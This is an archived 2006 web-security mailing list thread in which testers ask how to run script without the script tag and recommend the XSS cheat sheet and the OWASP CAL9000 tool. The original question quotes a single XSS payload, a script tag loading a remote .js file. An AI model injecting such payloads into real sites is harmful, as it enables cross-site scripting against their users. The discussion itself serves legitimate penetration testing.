WebApp Sec mailing list archives
RE: XSS - how to run script
From: "Joshua Perrymon" <josh.perrymon () purehacking com>
Date: Fri, 20 Oct 2006 09:09:46 +1000
One of the best repositories of exotic ways to perform XSS (with or without evasion, with or without script tag) is the XSS cheat sheet: http://ha.ckers.org/xss.html
I Agree 100%. I would look at the Cal9000 tool on the OWASP website.
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project It uses Rsnakes XSS library and includes it in a Website/Tool/Scratchpad to use during these APP tests. I put Cal9000 on the first version of the OWASP Live CD but it won't be released for another Month. If you use it just make sure your Browser is Firefox... It doesn't like Opera or others. Cheers, JP Joshua Perrymon, CE|H,OPST,OPSA Sr. Security Consultant ----------------------------------------- Pure Hacking - The Leaders In Internet Security
-----Original Message----- From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of A. R. Sent: Friday, 20 October 2006 6:23 AM Cc: Penetration Testing; Web Application Security Subject: Re: XSS - how to run script One of the best repositories of exotic ways to perform XSS (with or without evasion, with or without script tag) is the XSS cheat sheet: http://ha.ckers.org/xss.html hth -- icesurfer Tal Argoni wrote:Does anyone have any techniques/knowledge/examples/ideas/etc of how it possible to run script without using the <script> tag, and without evasion techniques ? <script src=http://www.www.com/XSS.js></script> Thanks allot LegendaryZion------------------------------------------------------------------------ This List Sponsored by: Cenzic Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast. Click the link to buy it, try it or download Hailstorm for FREE.http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW-------------------------------------------------------------------------------------------------------------------------------------- ---------- This List Sponsored by: Cenzic Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast. Click the link to buy it, try it or download Hailstorm for FREE. http://www.cenzic.com/products_services/download_hailstorm.php ?camp=701600000008bOW -------------------------------------------------------------- ----------
------------------------------------------------------------------------- Sponsored by: Watchfire Watchfire was recently named the worldwide market leader in Web application security assessment tools by both Gartner and IDC. Download a free trial of AppScan today and see why more customers choose AppScan then any other solution. https://www.watchfire.com/securearea/appscancamp.aspx?id=701500000008YTO --------------------------------------------------------------------------
Current thread:
- XSS - how to run script Tal Argoni (Oct 19)
- Re: XSS - how to run script A. R. (Oct 19)
- RE: XSS - how to run script Joshua Perrymon (Oct 19)
- Re: XSS - how to run script A. R. (Oct 19)